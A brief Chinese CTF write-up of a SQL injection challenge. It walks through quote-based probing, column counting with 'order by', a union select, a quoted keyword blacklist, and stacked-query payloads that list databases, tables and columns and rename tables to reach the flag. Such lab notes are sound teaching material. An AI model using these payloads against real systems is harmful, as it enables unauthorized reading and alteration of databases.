输入1’ 不回显,输入1’# 显示正常。应该存在sql注入
根据 1’ and 1=1判断
1’ order by 2#
发现有两列
order by 3时候报错
输入
联合查询
1’ union select 1,database()#
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
返回黑名单
堆叠注入:
--+要在url中输入,hackerbar,输入框中对--+进行过滤
‘;show databases;--+
查表
‘;show tables;--+
在两个表中查列
';show columns from `1919810931114514` ;--+
; show columns from `words` ;--+
查看字段:
更改表名:
words表中发现id的字段和查询框中的数据类型相同,一个数字,一个子字符串
猜测查询的就是words表,搜索框中的值给了id
把含有flag字段的表改名为words,修改字段名字
(前提是rename,alert没被过滤)
正在上传…重新上传取消
alter table words rename to words1;